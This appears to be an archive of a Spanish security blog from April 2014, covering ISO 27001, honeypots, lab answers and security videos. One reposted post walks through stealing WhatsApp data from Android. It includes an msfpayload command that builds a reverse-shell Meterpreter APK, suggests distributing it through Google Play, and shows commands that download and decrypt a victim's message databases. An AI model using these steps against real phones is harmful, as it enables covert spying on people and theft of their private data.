miércoles, 30 de abril de 2014

Cortometraje de la seguridad de la información

Este es un muy buen cortometraje sobre la realidad que se vive de nuestra información, como esta es difundida, ya sea por el robo de información o venta de la misma. Al final esto no es mas que un corriente que se sigue y se seguirá, pues es como en verdad se mueve el mundo y aun cuando tomemos medidas de seguridad para gestionar nuestra información, siempre habrá una fuga de información existencial  


Cortometraje.

Saludos.
Lexer Pars.  

martes, 29 de abril de 2014

ISO/IEC 27000-series (III de XII)

ISO/IEC 27001 es un estándar para la seguridad de la información (Information technology - Security techniques - Information security management systems - Requirements) aprobado y publicado como estándar internacional en octubre de 2005 por International Organization for Standardization y por la comisión International Electrotechnical Commission.
Especifica los requisitos necesarios para establecer, implantar, mantener y mejorar un sistema de gestión de la seguridad de la información (SGSI) según el conocido como “Ciclo de Deming”: PDCA - acrónimo de Plan, Do, Check, Act (Planificar, Hacer, Verificar, Actuar). Es consistente con las mejores prácticas descritas en ISO/IEC 27002, anteriormente conocida como ISO/IEC 17799, con orígenes en la norma BS 7799-2:2002, desarrollada por la entidad de normalización británica, la British Standards Institution (BSI).

Cuatro fases del sistema de gestión de seguridad de la información

La norma ISO 27001 determina cómo gestionar la seguridad de la información a través de un sistema de gestión de seguridad de la información. Un sistema de gestión de este tipo, igual que las normas ISO 9001 o ISO 14001, está formado por cuatro fases que se deben implementar en forma constante para reducir al mínimo los riesgos sobre confidencialidad, integridad y disponibilidad de la información.
Las fases son las siguientes:
  • La Fase de planificación: esta fase sirve para planificar la organización básica y establecer los objetivos de la seguridad de la información y para escoger los controles adecuados de seguridad (la norma contiene un catálogo de 133 posibles controles).
  • La Fase de implementación: esta fase implica la realización de todo lo planificado en la fase anterior.
  • La Fase de revisión: el objetivo de esta fase es monitorear el funcionamiento del SGSI mediante diversos “canales” y verificar si los resultados cumplen los objetivos establecidos.
  • La Fase de mantenimiento y mejora: el objetivo de esta fase es mejorar todos los incumplimientos detectados en la fase anterior.
El ciclo de estas cuatro fases nunca termina, todas las actividades deben ser implementadas cíclicamente para mantener la eficacia del SGSI.

Documentos de ISO 27001

La norma ISO 27001 requiere los siguientes documentos:
  • el alcance del SGSI;
  • la política del SGSI;
  • procedimientos para control de documentación, auditorías internas y procedimientos para medidas correctivas y preventivas;
  • todos los demás documentos, según los controles aplicables;
  • metodología de evaluación de riesgos;
  • informe de evaluación de riesgos;
  • declaración de aplicabilidad;
  • plan de tratamiento del riesgo;
  • registros.
La cantidad y exactitud de la documentación depende del tamaño y de las exigencias de seguridad de la organización; esto significa que una docena de documentos serán suficientes para una pequeña organización, mientras que las organizaciones grandes y complejas tendrán varios cientos de documentos en su SGSI.

La Fase de planificación

Esta fase está formada por los siguientes pasos:
  • determinación del alcance del SGSI;
  • redacción de una Política de SGSI;
  • identificación de la metodología para evaluar los riesgos y determinar los criterios para la aceptabilidad de riesgos;
  • identificación de activos, vulnerabilidades y amenazas;
  • evaluación de la magnitud de los riesgos;
  • identificación y evaluación de opciones para el tratamiento de riesgos;
  • selección de controles para el tratamiento de riesgos;
  • obtención de la aprobación de la gerencia para los riesgos residuales;
  • obtención de la aprobación de la gerencia para la implementación del SGSI;
  • redacción de una declaración de aplicabilidad que detalle todos los controles aplicables, determine cuáles ya han sido implementados y cuáles no son aplicables.

La Fase de implementación

Esta fase incluye las siguientes actividades:
  • redacción de un plan de tratamiento del riesgo que describe quién, cómo, cuándo y con qué presupuesto se deberían implementar los controles correspondientes;
  • implementación de un plan de tratamiento del riesgo;
  • implementación de los controles de seguridad correspondientes;
  • determinación de cómo medir la eficacia de los controles;
  • realización de programas de concienciación y capacitación de empleados;
  • gestión del funcionamiento normal del SGSI;
  • gestión de los recursos del SGSI;
  • implementación de procedimientos para detectar y gestionar incidentes de seguridad.

La Fase de verificación

Esta fase incluye lo siguiente:
  • implementación de procedimientos y demás controles de supervisión y control para determinar cualquier violación, procesamiento incorrecto de datos, si las actividades de seguridad se desarrollan de acuerdo a lo previsto, etc.;
  • revisiones periódicas de la eficacia del SGSI;
  • medición la eficacia de los controles;
  • revisión periódica de la evaluación de riesgos;
  • auditorías internas planificadas;
  • revisiones por parte de la dirección para asegurar el funcionamiento del SGSI y para identificar oportunidades de mejoras;
  • actualización de los planes de seguridad para tener en cuenta otras actividades de supervisión y revisión;
  • mantenimiento de registros de actividades e incidentes que puedan afectar la eficacia del SGSI.

La fase de mantenimiento y mejora

Esta fase incluye lo siguiente:
  • implementación en el SGSI de las mejoras identificadas;
  • toma de medidas correctivas y preventivas y aplicación de experiencias de seguridad propias y de terceros;
  • comunicación de actividades y mejoras a todos los grupos de interés;
  • asegurar que las mejoras cumplan los objetivos previstos.

Saludos.
Lexer Pars. 

***************************************************************************************************************************************
ISO/IEC 27000-series (I de XII)
ISO/IEC 27000-series (II de XII)
ISO/IEC 27000-series (III de XII)
ISO/IEC 27000-series (IV de XII)
ISO/IEC 27000-series (V de XII)
ISO/IEC 27000-series (VI de XII)
ISO/IEC 27000-series (VII de XII)
ISO/IEC 27000-series (VIII de XII)
ISO/IEC 27000-series (IX de XII)
ISO/IEC 27000-series (X de XII)
ISO/IEC 27000-series (XI de XII)
ISO/IEC 27000-series (XII de XII)
***************************************************************************************************************************************

lunes, 28 de abril de 2014

Porque no es bueno conectarse a redes wifi, cuando la tecnología es insegura

Ya se ha hablado mucho de los riesgos existentes de conectarse a redes con wifi con pocas medidas de seguridad o redes abiertas o publicas, pues nunca se sabe cuando se va a ser una victima del cibercrimen. Te quiero compartir un video sobre este tema, y si eres una de esas personas que se conecta con a la red del vecino, que tengas cuidado, puede que te lleves una sorpresa.



Redes Wifi inseguras y el cibercrimen.
Saludos.
Lexer Pars.

domingo, 27 de abril de 2014

Laboratorio Seguridad Informática(II de II)

Continuando con la resolución del laboratorio, veremos los siguientes puntos:
  1. Desarrolle la temática de las áreas del Gobierno de TI. Las áreas del gobierno de TI comprende las siguientes: Alineamiento estratégico, que consiste en establecer una conexión entre los planes de TI, con los objetivos del negocio, así como definir, mantener y validar las propuestas de valor de TI, buscando tener un mejor resultado que la competencia.Entrega de Valor: Consiste en realizar las ejecuciones de las propuestas de valor en el tiempo planificado de entrega, asegurando que TI entrega los beneficios relacionados con la estrategia de negocios, buscando optimizar costes y generando un valor intrínseco para TI . Gestión de riesgo: En esta área se requiere de concienciacion por parte de la alta dirección, comprende la necesidad de cumplir los requisitos, integrar responsabilidades y la transparencia en el tratamiento de riesgos mas significativos.   Gestión de recursos: Se centra en organizar los recursos de TI de forma que quienes necesites los servicios puedan tenerlos en cualquier momento, así como controlar y monitorear los servicios propios y externos .Y Medición del rendimiento:Sigue y controla la estrategia de implantación, la estrategia de los proyectos, el uso de los recursos, el rendimiento de los procesos y la entrega de los servicios utilizados BSC.     
  2. Desarrolle la temática sobre Hacking Ético. El hacking ético consiste en las practicas de seguridad, concernientes en pruebas de penetración a sistemas utilizando distintos medios o formas, con el fin de solucionar las fallas encontradas o reportar las vulnerabilidades, sin causar algún daño a los sistemas o información.    
  3. Desarrolle la temática sobre hardening. Este es un proceso que busca personalizar ya sea un sistema, aplicación,dispositivo, etc, de tal forma que se minimicen las cantidad de características,opciones, permisos, puertos, etc., y que el elemento al cual se somete al proceso de hardening, opere solo con los requisitos necesarios y se deshabilite lo que no sea útil o necesario para operar.  
  4. Mencione algunas medidas de seguridad que implementaría en un centro de datos. En cuanto a seguridad física, cámaras de seguridad, sistemas biometricos para el acceso a los servidores, un regulador de temperatura, un cuarto con un blindaje, guardias de seguridad., etc, en cuanto a la seguridad lógica, un sistema antimalware, una lista de control de acceso, un corta fuego, un WAF, establecer una honeynet o un conjunto de honeypots, una VPN, en definitiva someterlos a un proceso de hardening.  
  5. Desarrolle la temática de seguridad física y lógica: La seguridad física consiste en todas aquellas medidas de seguridad que permiten resguardar los activos de la organización contra todo ataque que quiera perpetrase por violaciones físicas, algunas medidas de seguridad pueden ser, implementación de sistemas biomeotricos, vayas de seguridad, guardas o personal de seguridad, cámaras de seguridad, etc. La seguridad lógica, es concerniente al aseguramiento de sistemas e información de la organización contra los ataques lógicos que puedan ser lanzados con ellos, que puede contemplar sistemas antimalware, DLP, ACL, WAF, Honeypot, DMZ, etc.      
Saludos.
Lexer Pars.
*********************************************************************************
Laboratorio Seguridad Informática(I de II)
Laboratorio Seguridad Informática(II de II)
*********************************************************************************

sábado, 26 de abril de 2014

Laboratorio Seguridad Informática(I de II)

Ya no les he comentado mucho sobre el curso de seguridad que estoy cursando actualmente en la Universidad, así que hoy quiero compartirles un laboratorio de este curso, aunque la mayoría de respuestas se encuentran ya incluidas en el blog, hay algunos temas que son de interés y que se escapan de este blog todavía.

  1. Que es Cibercirmen? Consiste en toda actividad ilegal llevada a cabo en el ambiente de la tecnología y que puede tener acciones como el robo de información, suplantación de identidad, ataques a sistemas, robo de activos físicos, por ejemplo utilizando el carding y banking, para robar el dinero o realizar estafas, que pueden  llevar a un cibercriminal a ganar mucho dinero, como para darse el lujo de comprar un flamante deportivo. Un aspecto importante que cabe resaltar, es que el termino ilegal, en muchas ocasiones es muy restrictivo y en materia de leyes, en cada país existen diversidades en cuanto a la legislación de actos criminales empleando la informática, el aspecto ético, para mi, es lo que verdaderamente define si algo es legal o ilegal en materia de seguridad informática.
  2. Que es Gobierno de TI? Es la forma en que la administración y gerencia de las organizaciones implementan procesos estandarizados que buscan alinear las tecnologías de información y telecomunicaciones con los objetivos de la organización.
  3. Cual es la situación actual en Guatemala en cuanto a materia de legislación de delitos informáticos? Actualmente hay existe una iniciativa de ley 4055,  que pretende regular todo esto, pero aun no se ha logrado una aprobación de dicha iniciativa por parte del poder legislativo, pero si hay algunos artículos que tipifican ciertos delitos informáticos, el cual es el código penal
  4. Desarrolle la temática de las áreas del Gobierno de TI. 
  5. Desarrolle la temática sobre Hacking Ético.
  6. Desarrolle la temática sobre hardening.
  7. Mencione algunas medidas de seguridad que implementaría en un centro de datos. 
  8. Desarrolle la temática de seguridad física y lógica.
Saludos.
Lexer Pars.
*********************************************************************************
Laboratorio Seguridad Informática(I de II)
Laboratorio Seguridad Informática(II de II)
*********************************************************************************

viernes, 25 de abril de 2014

ISO/IEC 27000-series (II de XII)

La ISO 27000 contiene términos y definiciones que se emplean en las demás normas o estándares que comprenden las series ISO 27000, es decir contiene el vocabulario necesario para la aplicación de cualquiera de los estándares que integran esta serie. 

Dicho vocabulario es de importancia para no formar mal interpretaciones técnicas o de gestión que puedan complicar la aplicación de algún estándar. Los objetivos de esta serie de normas, son mantener los 3 pilares de la seguridad al cien por ciento, que son la integridad, confidencialidad y disponibilidad de la información.  

La aplicación de estas normas esta dirigida a todo tipo de organización sea esta de carácter privado o publica. El estándar ISO 27000, que contiene el vocabulario esencial para comprender y poder implementar los demás estándares es gratuito, aunque los restantes estándares pertenecientes a la serie tienen un costo, no se compara con los beneficios que traer el hecho de aplicar este estándar en la organización.      

Saludos.
Lexer Pars. 

***************************************************************************************************************************************
ISO/IEC 27000-series (I de XII)
ISO/IEC 27000-series (II de XII)
ISO/IEC 27000-series (III de XII)
ISO/IEC 27000-series (IV de XII)
ISO/IEC 27000-series (V de XII)
ISO/IEC 27000-series (VI de XII)
ISO/IEC 27000-series (VII de XII)
ISO/IEC 27000-series (VIII de XII)
ISO/IEC 27000-series (IX de XII)
ISO/IEC 27000-series (X de XII)
ISO/IEC 27000-series (XI de XII)
ISO/IEC 27000-series (XII de XII)
***************************************************************************************************************************************

jueves, 24 de abril de 2014

ISO/IEC 27000-series (I de XII)

Unos de los estándares mas conocidos en la seguridad de la información son la serie de normas o estándares ISO 27000, dichas normas fueron publicadas por la Comisión Electrotécnica Internacional (CEI),y la Organización Internacional para la Estandarizacion (ISO), estos estándares están orientados a los sistemas de gestión de seguridad de la información, en los cuales se tienen expuestas las mejores practicas que deben seguirse al momento de desarrollar, implementar y mantener un sistema de este tipo.    

Dentro de los estándares podemos encontrar los siguientes:
  1. ISO/IEC 27000.
  2. ISO/IEC 27001.
  3. ISO/IEC 27002.
  4. ISO/IEC 27002:2005.
  5. ISO/IEC 27003.
  6. ISO/IEC 27004.
  7. ISO/IEC 27005.
  8. ISO/IEC 27006:2007.
  9. ISO/IEC 27007.
  10. ISO/IEC 27799:2008.
  11. ISO/IEC 27035:2011.
Iremos conociendo estos estándares en una serie de post, para entenderlos mejor y saber de que tratan y como se aplican en las organizaciones.

Saludos.
Lexer Pars. 

***************************************************************************************************************************************
ISO/IEC 27000-series (I de XII)
ISO/IEC 27000-series (II de XII)
ISO/IEC 27000-series (III de XII)
ISO/IEC 27000-series (IV de XII)
ISO/IEC 27000-series (V de XII)
ISO/IEC 27000-series (VI de XII)
ISO/IEC 27000-series (VII de XII)
ISO/IEC 27000-series (VIII de XII)
ISO/IEC 27000-series (IX de XII)
ISO/IEC 27000-series (X de XII)
ISO/IEC 27000-series (XI de XII)
ISO/IEC 27000-series (XII de XII)
***************************************************************************************************************************************

miércoles, 23 de abril de 2014

Hoy me han dejado sin energías y me ha tocado dejar un espacio para recuperarme y bueno me queda poco tiempo para dormir, ya que aun me encuentro en una fiesta sin un ordenador y me ha tocado irremediablemente compartirte una charla sobre hacking y anonimato que de nada te vendrá mal, así que hechale un vista y sigue estos sabios consejos.

Hacking y anonimato.

Saludos.
Lexer Pars.

martes, 22 de abril de 2014

Robar WhatsApp de Android con Meterpreter de Metasploit

Facebook ha comprado WhatsApp y con ello todo lo bueno y malo que tiene esta aplicación. Lo bueno es algo sencillo de entender y es que tener más de 500 millones de usuarios es algo importante para la firma, pero también se lleva todos los problemas de seguridad que desde hace años van arrastrando a golpe de parche, aunque siguen apareciendo nuevos fallos en el cifrado y fugas de información que dejan ver tú número de teléfono, la ubicación donde estás o la dirección IP desde la que estás conectado. Además, hace algunas semanas se ha golpeado con mucha fuerza la aplicación de mensajería instantánea.

Sabemos que existen muchos métodos para espiar WhatsApp, aunque semanas atrás salió a la luz el método con el que WhatsApp para Android cifra y descifra las bases de datos de la aplicación. Conseguir estas bases de datos en Android es sencillo, ya que se almacenan en la SDCard del dispositivo, pero también pueden sacarse de un dispositivo iPhone si se tiene acceso local o al backup, aunque el proceso podría complicarse un poco, en función de si hay jailbreak o no, si hay SSH por defecto, y del tipo de dispositivo que sea y la versión del sistema iOS. Siempre podríamos intentar encontrar una vía realizando un hacking a dispositivos iPhone completo.

Alejandro Ramos (@aramosf) liberó un script en Python dónde teniendo la base de datos cifrada y el usuario de Gmail utilizado en el dispositivo Android se puede obtener las conversaciones descifradas y listas para su lectura. Además, el servicio Recover Messages ya dispone de esta funcionalidad para la recuperación de mensajes recuperados de una base de datos cifrada.

Figura 1: Script de descifrado de bases de datos Crypt5 de WhatsApp

¿Cómo funciona el cifrado y el descifrado? El algoritmo para cifrar es aes-cbc-192, la información de la base de datos es cifrada utilizando una clave y el nombre de la cuenta de correo electrónico del dispositivo. El modo cbc, cipher block chaining, aplica a cada bloque de texto plano un XOR con el bloque anteriormente cifrado, para su posterior cifrado. De este modo cada bloque de texto cifrado va a depender de todo lo que está en plano procesado hasta el momento. El vector de inicialización hace que cada mensaje sea único.

PoC: El llamado Wonderland

En algunos ámbitos Meterpreter, una famosa shellcode utilizada por muchos pentesters en el maravilloso framework de explotación Metasploit, es conocido como Wonderland, ya que proporciona al usuario todas las características en la toma de control de un dispositivo remoto, y lo que haremos será jugar con él y ver qué cosas, entre otras muchas, podemos hacer. Algunas de las cosas interesantes que podemos hacer con esta shellcode en un dispositivo móvil es robar la base de datos de WhatsApp, y después descifrarla.

Lo primero es conseguir ejecutar Meterpreter en un dispositivo Android. Esto puede ser tarea no sencilla, pero con un poco de imaginación se nos pueden ocurrir muchas vías. ¿Por qué no entrar por la puerta principal? Sí, podemos intentar entrar por Google Play, ¿En serio?

En esta vida todo es probar, y como ya ha explicado Sergio de los Santos hay un ecosistema de Malware y Fake Apps en Google Play lo suficientemente grande como para que se note mucho que hemos metido un Meterpreter. Además, hemos visto que hay peleas por hacer fakes app de WhatsApp, que hay quién se ha dado de alta como Apple Inc, los que se dedican a hacer estafas de SMS Premium como la de la Linterna Molona y cibercriminales que roban el WhatsApp directamente con supuestos juegos. ¡Manos a la obra!

Figura 2: Fakes App de un supuesto Apple Inc en Google Play

La primera vía sería utilizar la herramienta msfpayload para generar un APK instalable en los dispositivos Android, pero este APK no podrá ser subido a Google Play por diversos motivos, entre ellos que no está firmado por el desarrollador. Para la toma de contacto es totalmente válido, por lo que os dejo aquí como hacer un APK para Android que ejecute una Meterpreter inversa:
msfpayload android/meterpreter/reverse_tcp LHOST=[dirección IP a la que se conecta la shellcode] LPORT=[puerto a la que se conecta] R > nombre_fichero.apk
Figura 2: Creando una APK con un Meterpreter

La otra vía sería desarrollar una APK que pida órdenes, por ejemplo, mediante un XML y que al recibir una instrucción maliciosa en ese XML se conecte a un servidor dónde le esperaremos para otorgarle un JAR, dónde empaquetado se encuentre la shellcode de Meterpreter. Este JAR se puede ejecutar dentro del provider de la app que la víctima descarga del Google Play. ¿En serio? Sigamos adelante…

Ahora una vez que tenemos de alguna de las dos formas preparadas la APK maliciosa, preparamos el servidor que recibirá la conexión y que debe devolver el JAR con la shellcode. Para ello utilizamos la herramienta del framework de Metasploit denominada msfconsole, tal y como se puede ver en la imagen.

Figura 4: Usando msfconsole de Metasploit desde un Kali Linux

Tras ejecutar la instrucción exploit en este módulo el servicio queda habilitado por lo que al recibir una conexión externa le devolveremos el JAR que completará la segunda stage de la ejecución de la shell Meterpreter.

En la siguiente imagen podéis visualizar como el servicio queda a la espera, y cuando recibe la conexión se envía el fichero y después se toma el control del dispositivo móvil. Recordad que lo interesante es que la APK sea distribuida a través de un market, y si es oficial el desastre sería mayor.

Figura 5: Stage 2. Se devuelve el JAR con la shell Meterpreter

Ahora podemos realizar diversas acciones con esta shellcode Meterpreter dentro del dispositivo. Sin ser root se puede, siempre y cuando la APK que ha conseguido colar la shellcode tenga permisos para ello, realizar fotografías y obtenerlas en remoto, capturar sonido con el micrófono, incluso abrir un streaming entre el dispositivo y el atacante para ver en tiempo, casi, real lo que está sucediendo.

Si abrimos una shell del sistema y navegamos por la estructura de carpetas, solo accederemos a sitios dónde la app pueda, ya que no somos root. La SDCard es uno de los puntos donde podemos aprovecharnos de no ser root y encontrar información muy interesante.

Figura 6: Ejecutando comandos en el sistema

Al ejecutar un ls podemos encontrar la carpeta de WhatsApp y todo lo que hay dentro de la SDCard, es como un pequeño gran bazar chino dónde podemos coger lo que queramos a un coste cero. Al meternos dentro de la carpeta de WhatsApp, ahora mismo estamos en la ruta /sdcard/WhatsApp podemos encontrar los siguientes elementos: backups, databases, media y profile pictures.

Todas las imágenes, vídeos y audios que la víctima haya intercambiado, enviados por él o recibidos, están accesibles y sin cifrar, por lo que ya nuestra shellcode podría descargarlo a nuestro equipo.

Figura 7: El contenido transmitido por WhatsApp

En la imagen se ve /storage/sdcard0/… por el tema de los enlaces, pero en este ejemplo nos da igual referirnos como /sdcard. Dicho esto, ¿Cómo descargamos una imagen directamente? Meterpreter proporciona un comando para realizar descargas de archivos, este comando es download, y su sintaxis es download [origen] [destino].

En la siguiente imagen se puede visualizar un ejemplo de cómo llevar a cabo esta instrucción y poder obtener todas las imágenes, vídeos y audios que se encuentran en la SDCard.

Figura 8: Descargando las imágenes enviadas por WhatsApp
Para llevar a cabo la operativa con las bases de datos con los mensajes de WhatsApp es exactamente igual, solo que la instrucción en este caso sería download /sdcard/WhatsApp/Databases/[nombre base de datos][destino máquina local].

Figura 9: Las bases de datos de WhatsApp en Android cifradas con crypt5

Ahora nos queda, una vez que hemos descargado la base de datos, utilizar el script que comentábamos al principio para descifrar la base de datos crypt5. El script lo debemos ejecutar como viene en la imagen, y solo necesitamos la cuenta de correo que está dada de alta en el dispositivo.

Figura 10: Descifrando la base de datos crypt5 de WhatsApp

Ahora que tenemos la base de datos descifrada podemos utilizar aplicaciones que abran formatos SQLite3, por ejemplo el add-on de Mozilla Firefox denominado SQLite Manager si queremos hacerlo rápido. La segunda columna nos da el teléfono con el que se interactúo en el mensaje, y en la columna de data va el mensaje que se envió. Hay más columnas interesantes, ya que no todo son mensajes de texto, en otras se especifican si se envió datos como imágenes, y el recurso en el que se encuentra, audios, vídeos, etcétera.

Figura 11: La base de datos SQLite de WhatsApp vista en SQLite Manager

Además, una vez que tienes los mensajes, el siguiente paso sería recuperar los mensajes que hayan sido eliminados del WhatsApp. Hay que tener en cuenta que no solo se recuperarán los mensajes de texto sino que también podrán recuperarse las miniaturas de las imágenes transmitidas, incluidas las de los vídeos y los mensajes de geo-localización, tal y como se explica en el artículo de Recuperar mensajes de WhatsApp borrados.

Autor: Pablo González 
Twitter: @PabloGonzalezPe

lunes, 21 de abril de 2014

SEGURIDAD INFORMATICA

Hoy quiero compartirles un capitulo de seguridad informática y adicional a esto un canal muy bueno dedicado al hacking, como los mundo hacker que ya había escrito en otro post sobre el funcionamiento de los sistemas antimalware, en el cual aprende mucho, lo único que necesitas es un ordenador, mucha dedicación y claro paciencia.

También puedes verlos por Discovery Max, hay capítulos muy interesantes que permiten ampliar tus conocimientos, ademas de entretenerte y disfrutar mientras los haces, aunque claro, los libros no pueden quedar de lado, pero son como los suplementos cuando vas al gimnasio.


Seguridad Informática.

Saludos.
Lexer Pars.


domingo, 20 de abril de 2014

Wideband GSM Sniffing [27C3]

Cada vez mantener la privacidad de la información y las telecomunicaciones se complica día a día y estar 100% seguro es algo con lo que definitivamente no se puede llegar a obtener, pues siempre existe algo nuevo de lo cual se desconoce.

Como el sniffing en la banda GSM que operan los teléfonos móviles, ya que hoy en día con un presupuesto bajo puedes obtener antenas de escaneo que te permitirán escuchar todo el trafico en esa banda bajo un radio de alcance.

Esto significa que pueden interceptar tus llamadas y mensajes, te imaginas si tuvieras algún sistema de verificación de 2 pasos, en el cual para garantizar el acceso es necesario la confirmación de numero temporal que sera enviado a tu móvil, aunque en realidad el abanico de riesgos es mucho mayor, es solo un ejemplo de esto.

   Sniffing GSM.

En el video anterior puedes disfrutar de esta conferencia, en la cual se trata del tema de sniffing GSM y que seguramente te dejara pensando sobre la seguridad en las frecuencias de tus dispositivos.

Saludos.
Lexer Pars.

sábado, 19 de abril de 2014

Intership

Hoy aprovechando un poco el día me he disfrutado un descanso que no me he podido dar en los días que han pasado de la semana, porque ya se esta terminado este "descanso" que en verdad no ha sido del todo unos día de relajación. Me he adelantando al Domingo y he aprovechado para ver una película muy chistosa que te recomiendo puedas ver. La película es sobre unos vendedores que ingresan a trabajar a google, en verdad esta película me ha dejado de un buen humor y me quitado un poco el estrés que he tenido en estos días, en fin, espero que puedas disfrutarla en estos días antes de volver al trabajo, o que la veas en otro momento.


Intership

Saludos.
Lexer Pars.

viernes, 18 de abril de 2014

Documental SPAM

Hoy quiero compartirles un documental sobre el SPAM muy bueno y que es de aprovechar para comprender el SPAM y las consecuencias de este, así como comprender mejor los conceptos de este, origen y demás aspectos importantes.
Documental SPAM.

Saludos.
Lexer Pars.

jueves, 17 de abril de 2014

Honeypot (III de III)

Al momento de implementar una Honeypot hay que tomar algunos factores en cuenta, como pueden ser, el riesgo que implica tener estos servidores, los costos asociados que tendrá y que sera lo mas factible técnicamente, ya sea virtualizar un grupo de honeypot o utilizar maquinas físicas para ello.

En el mercado hay diversos productos o herramientas que ayudan a implementar una honeypot, entre estas herramientas podemos mencionar las siguientes:

  1. Qemu.
  2. User Mode-Linux.
  3. Specter.
  4. KFSensor.
  5. Proxypot.
  6. Deception Toolkit.
  7. Send Mail SPAM trap.
  8. HoneyBot.
  9. HonetWeb, etc.
En el caso de algunas honeypot de baja interacción son fáciles de instalar y configurar a diferencia de las de alta interacción, te dejare un video de como implementar una honeypot de baja interacción, la cual puede ser utilizada tanto para recolección de información, así como para confundir a un atacante y anticiparte a las posibles amenazas que intenten materializarse.

   Instalación y configuración de honeypot

Saludos.
Lexer Pars.
******************************************************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************************************************************************************************************************************************

miércoles, 16 de abril de 2014

Honeypot (II de III)

Honeypot de baja interacción 
Este tipo de honeypot se caracterizan por ser software o programas que simulan ser sistemas operativos y son empleados unicamente como medida de seguridad, por ejemplo utilizarlo para mitigar o reducirlos los ataques sufridos por los sistemas de una organización. Un ejemplo de estos son los sticky honeypot, un software que se puede emplear es LaBrea.

Honeypot de alta interacción
En la mayoría de los casos este tipo de honeypot suele ser usado para fines de investigación, las cuales se encargan de recopilar la información los ataques registrados y cabe aclarar que este tipo de honeypot trabajan sobre sistemas operativos reales, es decir a diferencia de las de baja interacción, en este caso no existe simulación alguna. Un ejemplo de esto son los grupos honeynet.


Saludos.
Lexer Pars.
******************************************************************************************************************************************************************************************************************************************************************************
******************************************************************************************************************************************************************************************************************************************************************************

martes, 15 de abril de 2014

Honeypot (I de III)

Las Honeypot o tarro de miel es un ordenador o conjunto de ordenadores anzuelo, expuestos bajo un conjunto de fallas o vulnerabilidades presentes, que tienen como objetivo, recopilar datos sobre los métodos, técnicas y tipos de ataques que reciben. Dicha información es analizada posteriormente con el fin de mejor la seguridad en base a los datos recopilados.

Figura 1: Esquema de implementación Honeypot.

También suelen ser utilizadas como medio de distracción antes los atacantes, permitiendo brindar alertas al administrador de forma anticipada, para tomar decisiones sobre que acciones tomar ante tales eventos.  

Los Honeypot pueden clasificarse en:

  1. Honeypot de baja interacción.
  2. Honeypot de alta interacción.

Saludos.
Lexer Pars.
******************************************************************************************************************************************************************************************************************************************************************************
Honeypot (I de I)
Honeypot (II de III)
Honeypot (III de III)
******************************************************************************************************************************************************************************************************************************************************************************

lunes, 14 de abril de 2014

Utilizas GNU/Linux, pues usa antivirus

Como aun en estas fechas hay personas que piensan que las plataformas de Unix, GNU/Linux, Macintosh y otras no son susceptibles a ser atacadas porque son los sistemas son muy seguros y complicados. Pues hoy me ha tocado rifarme el intelecto con un administrador que decidió implementar un plataformas GNU/Linux.

En principio pensó que era una perdida de tiempo lo de instalar un sistema anti-malware en los equipos, pero después de algunas pruebas que realizamos, como un ataque man in the middle, en el cual no hubo ni una sola alerta de dicho ataque y mucho menos mitigar del mismo. Algunos ataques al cliente, explotando unas fallas, entre otras opciones.

A veces pareciera ser que las empresas suelen sacar productos y mas productos en cuestiones de seguridad, a tal punto de que todo lo hacen sin ningún otro sentido que explotar tu bolsillo, pero la realidad es que los productos de seguridad son desarrollados y lanzados al mercado tras investigaciones realizadas sobre los tantos casos del cibercrimen y amenazas que existen, y buscan satisfacer esas necesidades en las organizaciones.

Es mejor que inviertas un par de billetes comprando un sistema anti-malware y no sufrir las consecuencias de un ataque en tu sistema, claro, aunado a esto deben implementarse una fortificación del sistema, para que tu sistema este un poco mas seguro.

Saludos.
Lexer Pars.

 

domingo, 13 de abril de 2014

Duro de matar 4.0

Como hoy es Domingo, tras una semana intensa y agotadora, estoy con muchas ganas de disfrutarme una película buena, y como todo informático con pasión por lo que hace, pues me veré esta película que es muy buena, aunque  aun no decido si he de comprarme una bolsa de frituras para acompañar la película, pero sea como sea, hoy la pasare de lo mejor, y espero que tu, si tienes un momento libre este día, lo aproveches y hagas algo que te relaje un poco, pues ya sabes que empezamos un periodo largo de descanso, así que, nada te dejo un tráiler de la película y a lo mejor te animas a verla. 
 
 

Duro de matar 4.0

Saludos.
Lexer Pars.

sábado, 12 de abril de 2014

Metasploitable 2

Metasploitable es un sistema operativo basado en GNU/Linux, el cual cuenta con múltiples servicios vulnerables y malas practicas de seguridad, que permite ser un sistema de pruebas o entorno controlado bajo el cual se puede aprender muchos aspectos de seguridad, sin la necesidad de incurrir a alterar servidores de organizaciones.
 
Algunos de los servicios que dispone el sistema vulnerable, son:
  • FTP.
  • Telnet.
  • SSH.
  • HTTP.
  • Domain.
  • VNC.
  • X11.
  • IRC.
  • SMTP.
  • Shell
  •  NFS
Los anteriores solo son algunos servicios, pero el sistema incluye mucho mas, y en la mayoría estos servicios brindan un acceso remoto directo al sistema, el sistema puede montarse en una maquina virtual y es muy aconsejable no colocarlo en una red hostil. El sistema incorpora un conjunto de pruebas traseras algunas incluidas en el software de forma intencional y otras no. Esto hace de este sistema un entorno ideal de aprendizaje, que puede ayudarte a iniciarte en este mundo, tan amplio como es la seguridad.
 
En otros post, iré incluyendo algunas practicas que puedes realizar con el sistema, en el cual veras los sencillo que puede llegar hacer, y lo jugoso de aprender con un entorno controlado.
 
Saludos.
Lexer Pars.

viernes, 11 de abril de 2014

Conferencia de seguridad, explotando vulnerabilidades.

Hoy quiero compartirles una conferencia sobre como explotar las vulnerabilidades que encontremos al realizar una auditoria de seguridad, que es donde se fundamenta la tercera fase del proceso de dichas auditorias.


 

Explotación de vulnerabilidades.
 
 
Saludos.
Lexer Pars.

jueves, 10 de abril de 2014

El poder de las redes sociales

Las redes sociales se han vuelto algo cotidiano en la vida de muchas personas, en algunos casos el estar conectado informándose y compartiendo información se transformado en una adicción que en suele llevar a tener prejuicios sobre las demás actividades que realizamos.
 
En una gran cantidad de ocasiones las personas comparten mucha información, sin tener una correcta gestión sobre la cantidad de información que se comparte, el tipo de información y a quien llega esta información. El hecho es que muchos usuarios no toman consciencia de la importancia y el daño que puede provocar la información mal gestionada.
 
Un reciente caso es de un video denominado descripción grafica del gato volador, no soy partidario del maltrato animal y las denuncias realizadas me parecieron muy acertadas, el hecho fundamental que cabe resaltar sobre este caso es las consecuencias que puede tener el compartir información en las redes sociales, pues son un medio masivo de comunicación, en el cual la información fluye mas rápido que en cualquier otro medio.
 
Figura 1: Capturas del video descripción grafica del gato volador.
 
El hecho de compartir este video, genero un movimiento en las redes sociales, perjudicando de forma directa a esta persona y de forma indirecta a la organización para la cual laboraba, es un ejemplo, muy sencillo de como puede afectar publicar información que no este gestionada.
 
